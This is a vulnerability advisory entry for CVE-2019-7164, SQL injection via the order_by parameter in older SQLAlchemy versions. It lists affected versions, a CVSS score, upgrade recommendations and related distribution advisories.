PT-2019-5718 · Sqlalchemy+5 · Sqlalchemy+5

Published

2019-02-01

Updated

2024-06-15

CVE-2019-7164

CVSS v4.0

Critical

Vector

AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Name of the Vulnerable Software and Affected Versions SQLAlchemy versions 1.2.17 and earlier SQLAlchemy versions 1.3.x through 1.3.0b2

Description The issue is related to SQL injection via the order by parameter. This allows an attacker to potentially execute arbitrary code. The vulnerability is due to a lack of protection for the SQL query structure.

Recommendations For SQLAlchemy versions 1.2.17 and earlier, update to a version later than 1.2.17 to resolve the issue. For SQLAlchemy versions 1.3.x through 1.3.0b2, update to a version later than 1.3.0b2 to resolve the issue. As a temporary workaround, consider restricting the use of the order by parameter to minimize the risk of exploitation.

Exploit

Fix

SQL injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-89

Related Identifiers

ALSA-2019:0981

ALSA-2019:0984

BDU:2021-00766

CESA-2019_0981

CESA-2019_0984

CVE-2019-7164

DLA-1718-1

DLA-2811-1

GHSA-887W-45RQ-VXGF

MGASA-2019-0350

OESA-2021-1039

OESA-2021-1071

OPENSUSE-SU-2019:2039-1

OPENSUSE-SU-2019:2064-1

OPENSUSE-SU-2019:2078-1

OPENSUSE-SU-2019_2039-1

OPENSUSE-SU-2019_2064-1

OPENSUSE-SU-2024:11211-1

OPENSUSE-SU-2024:12915-1

PYSEC-2019-123

RHSA-2019:0981

RHSA-2019:0984

RHSA-2019_0981

RHSA-2019_0984

RLSA-2019:0981

RLSA-2019:0984

SUSE-SU-2019:2211-1

SUSE-SU-2019:2253-1

SUSE-SU-2019:2253-2

SUSE-SU-2019:2261-1

SUSE-SU-2019:2267-1

SUSE-SU-2019:2350-1

SUSE-SU-2019:2374-1

SUSE-SU-2019_2211-1

SUSE-SU-2019_2253-1

SUSE-SU-2019_2253-2

Affected Products

Almalinux

Centos

Red Hat

Rocky Linux

Sqlalchemy

Suse

PT-2019-5718 · Sqlalchemy+5 · Sqlalchemy+5

CVE-2019-7164

Weakness Enumeration

Related Identifiers

Affected Products

References · 151